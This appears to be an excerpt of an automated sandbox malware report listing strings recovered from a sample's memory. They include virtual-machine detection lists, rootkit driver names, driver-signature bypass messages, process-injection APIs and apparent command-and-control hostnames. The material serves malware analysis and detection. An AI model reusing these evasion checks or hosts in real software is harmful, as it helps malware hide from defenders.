Source: 1dyvctHqv1.exe, 0000000C.00000002.332663747.00000000160D4000.00000004.00000001.sdmp	Binary or memory string: ?advapi32.dllbackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeShellExperienceHost.exeshellexperiencehost.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exesmartscreen.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSystemSettingsBroker.exesystemsettingsbroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSgrmBroker.exevgauthservice.exeTrustedInstaller.exetrustedinstaller.exevgauthservice.exevgauthservice.exe1dyvctHqv1.exevgauthservice.exevmmemctlvmusbmousevmx_svga[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUq
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: vmhgfs$
Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp	Binary or memory string: vboxtray.exevboxservice.exesmss.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewininit.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewinlogon.exevboxtray.exevboxservice.exeservices.exevboxtray.exevboxservice.exelsass.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedwm.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesihost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exectfmon.exevboxtray.exevboxservice.exeexplorer.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeSearchUI.exesearchui.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeHxTsr.exehxtsr.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.execonhost.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesgrmbroker.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exe1dyvcthqv1.exevboxtray.exevboxservice.exeOpenSCManagerWOpenServiceWVBoxSF$
Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp	Binary or memory string: [system process]vboxtray.exe
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: vmsrvc.exevmusrvc.exesmss.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewininit.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewinlogon.exevmsrvc.exevmusrvc.exeservices.exevmsrvc.exevmusrvc.exelsass.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedwm.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exespoolsv.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesihost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exectfmon.exevmsrvc.exevmusrvc.exeexplorer.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.execonhost.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevpc-s3vpcuhub$
Source: csrss.exe	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: systemvmsrvc.exe
Source: csrss.exe	Binary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: ><'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
Source: csrss.exe	Binary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp	Binary or memory string: GPUB3SR64GYCloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry
Source: 1dyvctHqv1.exe, 00000000.00000002.298174176.0000000004BC5000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326226271.0000000004D87000.00000040.00000001.sdmp, csrss.exe, 00000011.00000002.554922240.0000000005200000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000002.408273398.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000021.00000002.406886356.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmp	Binary or memory string: ameNewaPINGPOSTQEMUROOTHIT!u
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
Source: 1dyvctHqv1.exe, 00000000.00000002.298174176.0000000004BC5000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326226271.0000000004D87000.00000040.00000001.sdmp, csrss.exe, 00000011.00000002.554922240.0000000005200000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000002.408273398.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000021.00000002.406886356.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmp	Binary or memory string: \\.\HGFS`
Source: svchost.exe, 00000003.00000002.550030923.0000012673428000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.550396287.000001B888267000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.550346133.0000025DB8829000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326077138.0000000003298000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: csrss.exe	Binary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
Source: csrss.exe	Binary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
Source: csrss.exe	Binary or memory string: ypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.we
Source: csrss.exe	Binary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
Source: 1dyvctHqv1.exe, 0000000C.00000002.332844890.0000000016100000.00000004.00000001.sdmp	Binary or memory string: runtimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe1dyvctHqv1.exexenevtchn
Source: csrss.exe	Binary or memory string: mAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6cha
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmp	Binary or memory string: tvmhgfsQ
Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmp	Binary or memory string: sharedintapp.exevmsrvc.exe
Source: svchost.exe, 00000003.00000002.550260603.0000012673464000.00000004.00000001.sdmp	Binary or memory string: HGFs&
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	Binary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
Source: svchost.exe, 00000003.00000002.549929478.0000012673402000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmp	Binary or memory string: yvmciwavewildwB
Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmp	Binary or memory string: [system process]vmsrvc.exe
Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmp	Binary or memory string: sharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.execonhost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exe1dyvcthqv1.exesharedintapp.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.exevmsrvc.exevmusrvc